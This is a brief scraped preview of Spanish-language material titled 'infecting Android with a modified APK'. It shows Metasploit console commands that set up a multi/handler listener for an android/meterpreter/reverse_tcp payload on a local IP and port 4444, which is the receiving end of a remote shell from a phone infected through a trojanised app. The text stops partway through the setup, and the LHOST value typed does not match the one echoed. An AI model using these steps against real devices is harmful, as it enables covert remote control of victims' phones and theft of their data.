Buscar

3 1 infectando android con apk modificada

Prévia do material em texto

https://www.facebook.com/micomputaxion/
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD android/meterpreter/reverse_tcp
PAYLOAD => android/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST localhost
LHOST => 192.168.0.185
msf5 exploit(multi/handler) > set LPORT 4444